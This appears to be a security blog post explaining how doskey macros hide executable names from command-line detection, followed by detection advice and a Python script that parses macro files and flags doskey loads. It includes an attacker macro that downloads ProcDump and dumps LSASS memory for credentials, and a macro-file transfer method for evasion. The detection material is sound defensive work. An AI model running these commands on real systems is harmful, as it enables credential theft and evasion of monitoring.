doskey
The doskey command can be used to evade some command-line detection rules by hiding the executable name behind an alias (a doskey "macro"): what the operator types into cmd.exe no longer contains the binary's name.
You can define and use a macro as such:
C:\Users\Target> doskey test1="%SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe" $*
C:\Users\Target> test1 gci c:\
    Directory: C:\

Mode                LastWriteTime     Length Name
----                -------------     ------ ----
d-----       01/10/2022     14:37            Intel
d-----       07/05/2022     07:24            PerfLogs
d-r---       09/10/2022     09:14            Program Files
d-r---       03/10/2022     09:33            Program Files (x86)
d-r---       01/10/2022     14:13            Users
d-----       13/10/2022     08:36            Windows
Clearly, any good detection rule will still catch "powershell.exe" on the command line of the macro definition itself, but you can import macros from a file so that the path never appears on a command line typed on the target.
Define and save the macros to a file:
C:\Users\Attacker> doskey test1="%SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe" $*
C:\Users\Attacker> doskey /m > legit.txt
Transfer the file to the target and load it:
C:\Users\Target> doskey /macrofile=legit.txt
C:\Users\Target> test1 gci c:\
    Directory: C:\

Mode                LastWriteTime     Length Name
----                -------------     ------ ----
d-----       01/10/2022     14:37            Intel
d-----       07/05/2022     07:24            PerfLogs
d-r---       09/10/2022     09:14            Program Files
d-r---       03/10/2022     09:33            Program Files (x86)
d-r---       01/10/2022     14:13            Users
d-----       13/10/2022     08:36            Windows
Another example, this time downloading ProcDump and dumping LSASS with it (needs admin rights):
C:\Users\Attacker> doskey test2=powershell (New-Object System.Net.Webclient).DownloadFile('https://download.sysinternals.com/files/Procdump.zip', 'test.zip'); Expand-Archive test.zip -DestinationPath test -Force; test/procdump.exe -accepteula -ma lsass.exe lsass.dmp
C:\Users\Attacker> doskey /m > legit.txt
On target:
C:\Windows\System32> doskey /macrofile=legit.txt
C:\Windows\System32> test2
ProcDump v10.11 - Sysinternals process dump utility
Copyright (C) 2009-2021 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com
[11:03:53] Dump 1 initiated: C:\Windows\System32\lsass.dmp
[11:03:54] Dump 1 writing: Estimated dump file size is 65 MB.
[11:03:54] Dump 1 complete: 65 MB written in 1.0 seconds
[11:03:55] Dump count reached.
You can also chain several commands in one macro definition with $t (the macro separator, equivalent to a newline):
doskey tx=cd temp$tdir /w $*
And macros are bound to an executable: by default they are defined for cmd.exe, but /exename lets you define them for another console program, here ftp.exe (example taken from the doskey documentation):
doskey /exename=ftp.exe go=open 172.27.1.100$tmget *.TXT c:\reports$tbye
Detection
This only hides the executable name from whatever records the console input, i.e. the text typed into cmd.exe. The macro is expanded before the command is executed, so cmd.exe still creates powershell.exe (or procdump.exe) with its real image path and full arguments: any hook that sits lower than the command-line history, such as process-creation telemetry (Security event 4688, Sysmon Event ID 1) or an EDR's kernel callbacks, will see exactly what it would have seen without the alias. You will also leave artifacts behind: the macro file containing the alias definitions on disk, and the execution of doskey.exe with /macrofile= on its command line.
I do not know to what extent doskey is still used on Windows systems today. I would suggest checking how often that binary is executed in your environment (on a SIEM, for example) and, if it is not frequently used, creating a detection rule on its execution, with a higher severity when a macro file is loaded.
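As an added example (this is not code from the original post), here is a small Python check covering both halves of that detection advice: it parses a doskey macro file such as the legit.txt above and reports macros that wrap a watched binary, and it runs two rules over process-creation events to show that a doskey.exe /macrofile= load is flagged and that the aliased powershell.exe child still appears under its real image. The event field names (Image, CommandLine, ParentImage) follow Sysmon Event ID 1; the watch-list of binaries, the macro file content and the events themselves are constructed for the example and are assumptions, not real telemetry.

```python
import re
from typing import Dict, List, Optional, Tuple

# Assumed watch-list: binaries that rarely belong behind a console alias on a workstation.
WATCHED_BINARIES = {"powershell.exe", "pwsh.exe", "cmd.exe", "certutil.exe",
                    "rundll32.exe", "mshta.exe", "regsvr32.exe", "wscript.exe",
                    "cscript.exe", "procdump.exe"}


def image_name(path: str) -> str:
    """Last path component of a Windows path, quotes stripped, lower-cased."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].strip('"').lower()


def parse_macro_file(text: str) -> Dict[str, Dict[str, str]]:
    """Parse the artifact left on disk: the output of 'doskey /macros' (or '/macros:all').

    Each line is 'name=body'; a '[exename]' line switches the section. Macros seen
    before any header are attributed to cmd.exe, the default doskey executable.
    Returns {exename: {macro_name: body}}.
    """
    macros: Dict[str, Dict[str, str]] = {}
    current = "cmd.exe"
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        header = re.fullmatch(r"\[(.+)\]", line)
        if header:
            current = header.group(1).lower()
            continue
        name, sep, body = line.partition("=")
        if not sep:
            continue  # not a macro definition
        macros.setdefault(current, {})[name.strip()] = body.strip()
    return macros


def suspicious_macros(macros: Dict[str, Dict[str, str]]) -> List[Tuple[str, str, str]]:
    """(exename, macro, watched binary) for each macro body naming a watched binary.

    The body is split on whitespace and on the $t command separator, so chained
    commands and bare names like 'powershell' (without .exe) are both caught.
    """
    hits: List[Tuple[str, str, str]] = []
    for exe, defs in macros.items():
        for name, body in defs.items():
            for token in re.split(r"\s+|\$[tT]", body):
                base = image_name(token)
                if not base.endswith(".exe"):
                    base += ".exe"
                if base in WATCHED_BINARIES and (exe, name, base) not in hits:
                    hits.append((exe, name, base))
    return hits


def flag_event(event: Dict[str, str]) -> Optional[str]:
    """Rules over one process-creation event (Sysmon EID 1 / Security 4688 style fields)."""
    image = image_name(event["Image"])
    parent = image_name(event.get("ParentImage", ""))
    cmd = event["CommandLine"].lower()
    if image == "doskey.exe":
        if re.search(r"/macrofile[=:]", cmd):
            return "high: doskey loaded a macro file"
        return "low: doskey.exe executed"
    # cmd.exe expands the alias before creating the process, so the child carries the
    # real image and arguments: a plain image-name rule is unaffected by the macro.
    if image in WATCHED_BINARIES and parent == "cmd.exe":
        return f"medium: cmd.exe spawned {image}"
    return None


def run_rules(events: List[Dict[str, str]]) -> List[Tuple[int, str]]:
    """Index and verdict of every event that triggers a rule."""
    return [(i, v) for i, ev in enumerate(events) if (v := flag_event(ev))]


# Constructed macro file, shaped like the legit.txt produced by 'doskey /macros:all'.
MACRO_FILE = r"""
[cmd.exe]
test1="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $*
tx=cd temp$tdir /w $*
test2=powershell (New-Object System.Net.Webclient).DownloadFile('https://download.sysinternals.com/files/Procdump.zip', 'test.zip'); Expand-Archive test.zip -DestinationPath test -Force; test/procdump.exe -accepteula -ma lsass.exe lsass.dmp
"""

# Constructed process-creation events: the macro-file load, then what cmd.exe actually
# launches when the operator types 'test1 gci c:\', then unrelated noise.
EVENTS = [
    {"Image": "C:\\Windows\\System32\\doskey.exe",
     "CommandLine": "doskey /macrofile=legit.txt",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe"},
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" gci c:\\",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe"},
    {"Image": "C:\\Windows\\System32\\notepad.exe",
     "CommandLine": "notepad.exe",
     "ParentImage": "C:\\Windows\\explorer.exe"},
]

if __name__ == "__main__":
    for hit in suspicious_macros(parse_macro_file(MACRO_FILE)):
        print("macro wraps watched binary:", hit)
    for idx, verdict in run_rules(EVENTS):
        print(f"event {idx}: {verdict}")
```

The macro-file parser is what you would point at the artifact recovered during forensics; the event rules are what the SIEM query would look like once you know doskey.exe is rare in your estate.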